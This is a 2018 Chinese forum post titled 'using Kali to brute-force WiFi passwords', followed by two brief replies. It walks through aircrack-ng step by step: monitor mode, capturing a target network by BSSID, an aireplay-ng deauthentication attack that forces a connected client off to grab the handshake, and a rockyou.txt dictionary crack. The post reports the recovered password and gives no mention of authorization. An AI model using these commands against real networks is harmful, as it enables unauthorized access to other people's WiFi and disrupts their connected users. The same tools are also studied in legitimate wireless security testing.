薯片 发表于 2018-9-3 16:59:04

利用KALI暴力破解WiFi密码

本帖最后由 薯片 于 2018-9-3 16:59 编辑

1.将无线网卡设置成 monitor 模式 airmon-ng start wlan0

关闭可影响实验的因素 airmon-ng check kill

2.运行 airodump-ng wlan0 扫描附近网段


暴力破解 WiFi 密码



BSSID   wifi 设备的 mac 地址

PWR   信号强度

Beacons   数据的速率

#Data   捕获的数据分组数量

#/S   十秒内的捕获数据分组数量

CH   信道号

MB   数据传输速率

ENC   加密类型

CIPHER   加密算法

AUTH   加密协议

ESSID WiFi 名称

3.确定好要破解的网络(以 2.4G 网络(备·)为例) 执行下面的命令

airodump-ng wlan0 –bssid F4:6A:92:2E:E8:B4 -c 1 -w pj/01

注释:-c 为指定信道 -w 为文件存放位置并起一个名

暴力破解 WiFi 密码

出现红框内内容表示已抓取到握手包 准备破解密码

如果抓不到握手包 可以发动攻击使一个已连接的用户掉线 使其重新认证连接 我们就此机会抓取握手包

aireplay-ng -0 10 -a F4:6A:92:2E:E8:B4 -c 78:02:F8:F1:8E:CD wlan0

暴力破解 WiFi 密码

注释:攻击模式为 0 攻击 10 次 攻击次数调为 0 为无限攻击 -a 为 AP 端 mac 地址 -c 为客户端 mac 地址 wlan0 为无线网卡的名字



附介绍几种攻击模式

Attack 0: Deauthentication 解除认证

Attack 1: Fake authentication 伪造身份验证

Attack 2: Interactive packet replay 交互式数据包重播

Attack 3: ARP request replay attack ARP 请求重播攻击

Attack 4: KoreK chopchop attack KoreK 斩杀攻击

Attack 5: Fragmentation attack 碎片攻击

Attack 6: Cafe-latte attack 咖啡拿铁攻击

Attack 7: Client-oriented fragmentation attack 面向客户的分片攻击

Attack 8: WPA Migration Mode WPA 迁移模式

Attack 9: Injection test 注射试验

4.ls 01*查看抓到包 选择 cap 格式

暴力破解 WiFi 密码

使用字典暴力破解

aircrack-ng -w /usr/share/wordlists/rockyou.txt 01-02.cap



暴力破解 WiFi 密码



破解成功 密码为 15331301

薯片 发表于 2018-9-3 17:00:13

给自己顶一下

2622835772 发表于 2020-4-13 21:39:53

这个看起来不错
页: [1]
查看完整版本: 利用KALI暴力破解WiFi密码